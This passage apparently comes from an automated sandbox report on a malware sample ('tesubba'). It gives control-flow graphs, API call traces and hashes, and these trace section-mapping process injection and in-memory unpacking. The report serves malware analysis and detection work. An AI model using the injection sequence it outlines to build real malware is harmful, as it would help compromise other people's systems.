                                                                                                            • LoadLibraryA.KERNELBASE(0041A3EC), ref: 00418DF2
                                                                                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 00418E27
                                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418E4E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.1687832752.000000000040B000.00000020.00000001.01000000.00000008.sdmp, Offset: 0040B000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_40b000_tesubba.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ConsoleFile$CommNamePath$CompareCopyExchangeInterlockedLengthObjectSearch$AdjustmentAlarmAliasAliasesAtomAttributesAuditBinaryComputerConfigCreateDefaultEnvironmentExesFindFocusFormatLibraryLoadLongMessageModeModuleMoveOutputPipePrivilegePurgeReadSingleStateStringsSystemTimeTypeWaitWrite
                                                                                                            • String ID: k`$}$
                                                                                                            • API String ID: 2220722107-956986773
                                                                                                            • Opcode ID: 27396c0720b35830d8978bde3fab0e4ce9b55130db9d37ea9e37c6b107803055
                                                                                                            • Instruction ID: 0c0e40555d578e92a9f225f047ccd42c64e3c90cdaccad76b264c498dc6ec0a1
                                                                                                            • Opcode Fuzzy Hash: 27396c0720b35830d8978bde3fab0e4ce9b55130db9d37ea9e37c6b107803055
                                                                                                            • Instruction Fuzzy Hash: 9FB1A0B1901224ABCB219B65EC58EDF7B78EF49350F00816EF649A3150DB785EC4CFA9

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 68 4014db-4014e7 69 401486-40148b 68->69 70 4014e9 68->70 71 401550-401569 70->71 72 4014eb 70->72 77 40155d-40156c call 4011a4 71->77 74 40155a 72->74 75 4014ed-4014fb 72->75 74->77 80 40149a-4014a8 75->80 81 4014fd-4014ff 75->81 84 40156e-40157f 77->84 85 4014c1-4014c8 80->85 83 401501 81->83 81->84 88 401504-401518 83->88 89 40148f 83->89 86 401581 84->86 87 401584-401589 84->87 90 401469-401485 call 4011a4 85->90 91 4014ca 85->91 86->87 98 4018a6-4018ae 87->98 99 40158f-4015a0 87->99 88->85 92 40151a 88->92 89->80 90->69 91->68 95 401539-401555 92->95 96 40151c-401526 92->96 95->71 98->87 106 4018a4-4018b3 99->106 107 4015a6-4015cf 99->107 109 4018c8 106->109 110 4018b9-4018c4 106->110 107->106 115 4015d5-4015ec NtDuplicateObject 107->115 109->110 112 4018cb-4018ff call 4011a4 109->112 110->112 115->106 117 4015f2-401616 NtCreateSection 115->117 119 401672-401698 NtCreateSection 117->119 120 401618-401639 NtMapViewOfSection 117->120 119->106 124 40169e-4016a2 119->124 120->119 122 40163b-401657 NtMapViewOfSection 120->122 122->119 125 401659-40166f 122->125 124->106 127 4016a8-4016c9 NtMapViewOfSection 124->127 125->119 127->106 128 4016cf-4016eb NtMapViewOfSection 127->128 128->106 130 4016f1 call 4016f6 128->130
                                                                                                            APIs
                                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.1687803922.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_400000_tesubba.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Section$CreateDuplicateObjectView
                                                                                                            • String ID: 1
                                                                                                            • API String ID: 1652636561-2212294583
                                                                                                            • Opcode ID: fc9ad0c17474763d406ce3553705aad449b4f49c1046925f20dec018cbeb3551
                                                                                                            • Instruction ID: 7f4d7c4657737381e02ab4131f106e217a3bc84f51a1891dc43a423f49ad99c1
                                                                                                            • Opcode Fuzzy Hash: fc9ad0c17474763d406ce3553705aad449b4f49c1046925f20dec018cbeb3551
                                                                                                            • Instruction Fuzzy Hash: 14718D71A00205FFEB209F91CC49FEF7BB8EF85B10F14412AF912BA2E5D6759905CA58

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 219 401529-401532 220 401543 219->220 221 401539-40153f 219->221 220->221 222 401546-40157f call 4011a4 220->222 221->222 232 401581 222->232 233 401584-401589 222->233 232->233 235 4018a6-4018ae 233->235 236 40158f-4015a0 233->236 235->233 239 4018a4-4018b3 236->239 240 4015a6-4015cf 236->240 242 4018c8 239->242 243 4018b9-4018c4 239->243 240->239 248 4015d5-4015ec NtDuplicateObject 240->248 242->243 245 4018cb-4018ff call 4011a4 242->245 243->245 248->239 250 4015f2-401616 NtCreateSection 248->250 252 401672-401698 NtCreateSection 250->252 253 401618-401639 NtMapViewOfSection 250->253 252->239 257 40169e-4016a2 252->257 253->252 255 40163b-401657 NtMapViewOfSection 253->255 255->252 258 401659-40166f 255->258 257->239 260 4016a8-4016c9 NtMapViewOfSection 257->260 258->252 260->239 261 4016cf-4016eb NtMapViewOfSection 260->261 261->239 263 4016f1 call 4016f6 261->263
                                                                                                            APIs
                                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.1687803922.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_400000_tesubba.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                            • String ID:
                                                                                                            • API String ID: 1546783058-0
                                                                                                            • Opcode ID: 9208168e61d895202d66972dbe02163783dcb6df2364333cde88f6d05e7d9971
                                                                                                            • Instruction ID: 138ec7ca1e8744eb65f40bd9736a53a73cefe8eecd72c79945fcbf62a21b6401
                                                                                                            • Opcode Fuzzy Hash: 9208168e61d895202d66972dbe02163783dcb6df2364333cde88f6d05e7d9971
                                                                                                            • Instruction Fuzzy Hash: D9616E71900205FBEB209F95DC49FEB7BB8FF81B00F14412AFA12BA1E4D6749A05DB65

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 267 401534-40157f call 4011a4 278 401581 267->278 279 401584-401589 267->279 278->279 281 4018a6-4018ae 279->281 282 40158f-4015a0 279->282 281->279 285 4018a4-4018b3 282->285 286 4015a6-4015cf 282->286 288 4018c8 285->288 289 4018b9-4018c4 285->289 286->285 294 4015d5-4015ec NtDuplicateObject 286->294 288->289 291 4018cb-4018ff call 4011a4 288->291 289->291 294->285 296 4015f2-401616 NtCreateSection 294->296 298 401672-401698 NtCreateSection 296->298 299 401618-401639 NtMapViewOfSection 296->299 298->285 303 40169e-4016a2 298->303 299->298 301 40163b-401657 NtMapViewOfSection 299->301 301->298 304 401659-40166f 301->304 303->285 306 4016a8-4016c9 NtMapViewOfSection 303->306 304->298 306->285 307 4016cf-4016eb NtMapViewOfSection 306->307 307->285 309 4016f1 call 4016f6 307->309
                                                                                                            APIs
                                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.1687803922.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_400000_tesubba.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                            • String ID:
                                                                                                            • API String ID: 1546783058-0
                                                                                                            • Opcode ID: bf712b81fe7c33e45fb91e121ae8a1411471c4f54e6f2b27f252d32f249b509c
                                                                                                            • Instruction ID: 46ca3ae5353e1b2bf85c7e7487c0bf4a09c0837efea8bedcf4105f5ea6450319
                                                                                                            • Opcode Fuzzy Hash: bf712b81fe7c33e45fb91e121ae8a1411471c4f54e6f2b27f252d32f249b509c
                                                                                                            • Instruction Fuzzy Hash: 81512971900245BFEF209F91CC48FEB7BB8EF85B00F14416AF912BA1A5D6749945CB24

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 313 401541-401543 315 401546-40157f call 4011a4 313->315 316 401539-40153f 313->316 326 401581 315->326 327 401584-401589 315->327 316->315 326->327 329 4018a6-4018ae 327->329 330 40158f-4015a0 327->330 329->327 333 4018a4-4018b3 330->333 334 4015a6-4015cf 330->334 336 4018c8 333->336 337 4018b9-4018c4 333->337 334->333 342 4015d5-4015ec NtDuplicateObject 334->342 336->337 339 4018cb-4018ff call 4011a4 336->339 337->339 342->333 344 4015f2-401616 NtCreateSection 342->344 346 401672-401698 NtCreateSection 344->346 347 401618-401639 NtMapViewOfSection 344->347 346->333 351 40169e-4016a2 346->351 347->346 349 40163b-401657 NtMapViewOfSection 347->349 349->346 352 401659-40166f 349->352 351->333 354 4016a8-4016c9 NtMapViewOfSection 351->354 352->346 354->333 355 4016cf-4016eb NtMapViewOfSection 354->355 355->333 357 4016f1 call 4016f6 355->357
                                                                                                            APIs
                                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.1687803922.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_400000_tesubba.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                            • String ID:
                                                                                                            • API String ID: 1546783058-0
                                                                                                            • Opcode ID: fdd984ed4eabfdf3fe245d48b6addcc777c2a155290e4dc39758af1e8cc42314
                                                                                                            • Instruction ID: 68c08b8250816e380b35483fe5a52fcf5a4ffa7bf922b91d474b11e8be87ed95
                                                                                                            • Opcode Fuzzy Hash: fdd984ed4eabfdf3fe245d48b6addcc777c2a155290e4dc39758af1e8cc42314
                                                                                                            • Instruction Fuzzy Hash: 99512AB1900205BFEF209F95CC48FEB7BB8EF85B10F14412AFA12BA1E5D6749945CB24

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 361 401545-40157f call 4011a4 369 401581 361->369 370 401584-401589 361->370 369->370 372 4018a6-4018ae 370->372 373 40158f-4015a0 370->373 372->370 376 4018a4-4018b3 373->376 377 4015a6-4015cf 373->377 379 4018c8 376->379 380 4018b9-4018c4 376->380 377->376 385 4015d5-4015ec NtDuplicateObject 377->385 379->380 382 4018cb-4018ff call 4011a4 379->382 380->382 385->376 387 4015f2-401616 NtCreateSection 385->387 389 401672-401698 NtCreateSection 387->389 390 401618-401639 NtMapViewOfSection 387->390 389->376 394 40169e-4016a2 389->394 390->389 392 40163b-401657 NtMapViewOfSection 390->392 392->389 395 401659-40166f 392->395 394->376 397 4016a8-4016c9 NtMapViewOfSection 394->397 395->389 397->376 398 4016cf-4016eb NtMapViewOfSection 397->398 398->376 400 4016f1 call 4016f6 398->400
                                                                                                            APIs
                                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.1687803922.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_400000_tesubba.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                            • String ID:
                                                                                                            • API String ID: 1546783058-0
                                                                                                            • Opcode ID: 9036e7d1caaa2f73f8ffe8f81ed6686f8338ecb8473fc941f507ff01140d436f
                                                                                                            • Instruction ID: b5c9534ba5f5358dff2a074a80b826bd55324152c05987841a878028393b6fdb
                                                                                                            • Opcode Fuzzy Hash: 9036e7d1caaa2f73f8ffe8f81ed6686f8338ecb8473fc941f507ff01140d436f
                                                                                                            • Instruction Fuzzy Hash: 94513AB1900245BFEF209F95CC48FEF7BB8EF85B00F14415AF911BA2A5D6749945CB24

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 404 401553-40157f call 4011a4 411 401581 404->411 412 401584-401589 404->412 411->412 414 4018a6-4018ae 412->414 415 40158f-4015a0 412->415 414->412 418 4018a4-4018b3 415->418 419 4015a6-4015cf 415->419 421 4018c8 418->421 422 4018b9-4018c4 418->422 419->418 427 4015d5-4015ec NtDuplicateObject 419->427 421->422 424 4018cb-4018ff call 4011a4 421->424 422->424 427->418 429 4015f2-401616 NtCreateSection 427->429 431 401672-401698 NtCreateSection 429->431 432 401618-401639 NtMapViewOfSection 429->432 431->418 436 40169e-4016a2 431->436 432->431 434 40163b-401657 NtMapViewOfSection 432->434 434->431 437 401659-40166f 434->437 436->418 439 4016a8-4016c9 NtMapViewOfSection 436->439 437->431 439->418 440 4016cf-4016eb NtMapViewOfSection 439->440 440->418 442 4016f1 call 4016f6 440->442
                                                                                                            APIs
                                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.1687803922.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_400000_tesubba.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                            • String ID:
                                                                                                            • API String ID: 1546783058-0
                                                                                                            • Opcode ID: 7e7aa486a7cba38a24c4655809e077ce32b0d632fdebb8ad14eb01bbdf3cd026
                                                                                                            • Instruction ID: 8d6641cc39e0a23de402a6cd7af9a8bcce9404ceaedab19c941a5a8b34b5f284
                                                                                                            • Opcode Fuzzy Hash: 7e7aa486a7cba38a24c4655809e077ce32b0d632fdebb8ad14eb01bbdf3cd026
                                                                                                            • Instruction Fuzzy Hash: 8C5119B1900205BFEF209F95CC48FEFBBB8EF85B00F14411AFA11AA2A5D6759945CB24

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 447 402ffa-40301e 448 403024-40303c 447->448 449 40313d-403142 447->449 448->449 450 403042-403053 448->450 451 403055-40305e 450->451 452 403063-403071 451->452 452->452 453 403073-40307a 452->453 454 40309c-4030a3 453->454 455 40307c-40309b 453->455 456 4030c5-4030c8 454->456 457 4030a5-4030c4 454->457 455->454 458 4030d1 456->458 459 4030ca-4030cd 456->459 457->456 458->451 461 4030d3-4030d8 458->461 459->458 460 4030cf 459->460 460->461 461->449 462 4030da-4030dd 461->462 462->449 463 4030df-40313a RtlCreateUserThread NtTerminateProcess 462->463 463->449
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.1687803922.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_400000_tesubba.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateProcessTerminateThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 1921587553-0
                                                                                                            • Opcode ID: be8e4cb5e493dd895ba0f666486257db29135dc3ef83a78b0b3b9a47898ca96e
                                                                                                            • Instruction ID: 67905ead67b615cb9fd2ac39997d468ff33d28dd355ca5d175fe45067cf906e9
                                                                                                            • Opcode Fuzzy Hash: be8e4cb5e493dd895ba0f666486257db29135dc3ef83a78b0b3b9a47898ca96e
                                                                                                            • Instruction Fuzzy Hash: 8B414732618E0C4FD778EE6CA88966377D5E798351B1643AAD809D3389EE30D85183C5

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 134 5a003c-5a0047 135 5a0049 134->135 136 5a004c-5a0263 call 5a0a3f call 5a0e0f call 5a0d90 VirtualAlloc 134->136 135->136 151 5a028b-5a0292 136->151 152 5a0265-5a0289 call 5a0a69 136->152 154 5a02a1-5a02b0 151->154 156 5a02ce-5a03c2 VirtualProtect call 5a0cce call 5a0ce7 152->156 154->156 157 5a02b2-5a02cc 154->157 163 5a03d1-5a03e0 156->163 157->154 164 5a0439-5a04b8 VirtualFree 163->164 165 5a03e2-5a0437 call 5a0ce7 163->165 166 5a04be-5a04cd 164->166 167 5a05f4-5a05fe 164->167 165->163 169 5a04d3-5a04dd 166->169 170 5a077f-5a0789 167->170 171 5a0604-5a060d 167->171 169->167 174 5a04e3-5a0505 169->174 175 5a078b-5a07a3 170->175 176 5a07a6-5a07b0 170->176 171->170 177 5a0613-5a0637 171->177 185 5a0517-5a0520 174->185 186 5a0507-5a0515 174->186 175->176 178 5a086e-5a08be LoadLibraryA 176->178 179 5a07b6-5a07cb 176->179 180 5a063e-5a0648 177->180 184 5a08c7-5a08f9 178->184 182 5a07d2-5a07d5 179->182 180->170 183 5a064e-5a065a 180->183 187 5a07d7-5a07e0 182->187 188 5a0824-5a0833 182->188 183->170 189 5a0660-5a066a 183->189 190 5a08fb-5a0901 184->190 191 5a0902-5a091d 184->191 192 5a0526-5a0547 185->192 186->192 193 5a07e2 187->193 194 5a07e4-5a0822 187->194 196 5a0839-5a083c 188->196 195 5a067a-5a0689 189->195 190->191 197 5a054d-5a0550 192->197 193->188 194->182 198 5a068f-5a06b2 195->198 199 5a0750-5a077a 195->199 196->178 200 5a083e-5a0847 196->200 202 5a05e0-5a05ef 197->202 203 5a0556-5a056b 197->203 204 5a06ef-5a06fc 198->204 205 5a06b4-5a06ed 198->205 199->180 206 5a084b-5a086c 200->206 207 5a0849 200->207 202->169 210 5a056f-5a057a 203->210 211 5a056d 203->211 208 5a074b 204->208 209 5a06fe-5a0748 204->209 205->204 206->196 207->178 208->195 209->208 214 5a059b-5a05bb 210->214 215 5a057c-5a0599 210->215 211->202 218 5a05bd-5a05db 214->218 215->218 218->197
                                                                                                            APIs
                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 005A024D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.1688048281.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_5a0000_tesubba.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID: cess$kernel32.dll
                                                                                                            • API String ID: 4275171209-1230238691
                                                                                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                            • Instruction ID: 339b6381adfffe255570805e1953e9d3465a61c11f423d1475d0b3c283b03e5d
                                                                                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                            • Instruction Fuzzy Hash: 3B526874A11229DFDB64CF58C984BACBBB1BF09304F1480D9E94DAB291DB30AE95DF14

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 446 418770-4188b0 GetModuleHandleW GetProcAddress VirtualProtect
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(00513D70), ref: 0041884F
                                                                                                            • GetProcAddress.KERNEL32(00000000,0041E298), ref: 0041888C
                                                                                                            • VirtualProtect.KERNELBASE(00513BB4,00513D6C,00000040,?), ref: 004188AB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.1687832752.000000000040B000.00000020.00000001.01000000.00000008.sdmp, Offset: 0040B000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_40b000_tesubba.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 2099061454-3916222277
                                                                                                            • Opcode ID: ff9a43801e185d10054e4e34767694ffcb7e86b2b941098a4c4c71e4807009e3
                                                                                                            • Instruction ID: 2b977b853b8716191c274d39b2deee1532fc6552ce3022b0d9a41b083186e0cb
                                                                                                            • Opcode Fuzzy Hash: ff9a43801e185d10054e4e34767694ffcb7e86b2b941098a4c4c71e4807009e3
                                                                                                            • Instruction Fuzzy Hash: D8316F18508780CAE301DB79FC257823F6AAB75744F04D0ACD54C8B3B1D7BA5618E36E

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 464 5d04bf-5d04d8 465 5d04da-5d04dc 464->465 466 5d04de 465->466 467 5d04e3-5d04ef CreateToolhelp32Snapshot 465->467 466->467 468 5d04ff-5d050c Module32First 467->468 469 5d04f1-5d04f7 467->469 470 5d050e-5d050f call 5d017e 468->470 471 5d0515-5d051d 468->471 469->468 476 5d04f9-5d04fd 469->476 474 5d0514 470->474 474->471 476->465 476->468
                                                                                                            APIs
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005D04E7
                                                                                                            • Module32First.KERNEL32(00000000,00000224), ref: 005D0507
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.1688128712.00000000005CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 005CD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_5cd000_tesubba.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                            • String ID:
                                                                                                            • API String ID: 3833638111-0
                                                                                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                            • Instruction ID: 030aa1044a22010c8a6a9bdea70e0361df3f6a28b217e74efe28ba26a380c176
                                                                                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                            • Instruction Fuzzy Hash: E4F06232100715ABDB302AF9A88DFAE7AE8BF49725F10152BE746922C0DA70E8454A61

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 477 5a0e0f-5a0e24 SetErrorMode * 2 478 5a0e2b-5a0e2c 477->478 479 5a0e26 477->479 479->478
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNELBASE(00000400,?,?,005A0223,?,?), ref: 005A0E19
                                                                                                            • SetErrorMode.KERNELBASE(00000000,?,?,005A0223,?,?), ref: 005A0E1E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.1688048281.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_5a0000_tesubba.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorMode
                                                                                                            • String ID:
                                                                                                            • API String ID: 2340568224-0
                                                                                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                            • Instruction ID: ce7575169f36a7c85206fcae42e0fcb861aa2e687c756cbd9285e154151780ed
                                                                                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                            • Instruction Fuzzy Hash: 18D0123114512877DB002A94DC09BCD7F1CDF09B62F008411FB0DD9080C770994046E5

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 498 40190e-40190f 499 401912-401963 call 4011a4 Sleep call 401426 498->499 500 4018b5-4018ff call 4011a4 498->500 523 401972-401978 499->523 524 401965-40196d call 401529 499->524 527 40198e 523->527 528 40197f-40198a 523->528 524->523 527->528 529 401991-4019bd call 4011a4 527->529 528->529
                                                                                                            APIs
                                                                                                            • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                              • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                              • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.1687803922.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_400000_tesubba.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 4152845823-0
                                                                                                            • Opcode ID: 2faec9f74094ce0f08c74674007c6dc18df4c3c5133ab61c0808bb95c55d4a7d
                                                                                                            • Instruction ID: c3efed824753038ef125f202698f45fd900918c8f6410fb3a7b527937a7c5fc5
                                                                                                            • Opcode Fuzzy Hash: 2faec9f74094ce0f08c74674007c6dc18df4c3c5133ab61c0808bb95c55d4a7d
                                                                                                            • Instruction Fuzzy Hash: D811BFB220C204EBEB00AA908C52EAA3754AF05710F248137BA42791F1C57D9A13F75B

                                                                                                            Control-flow Graph

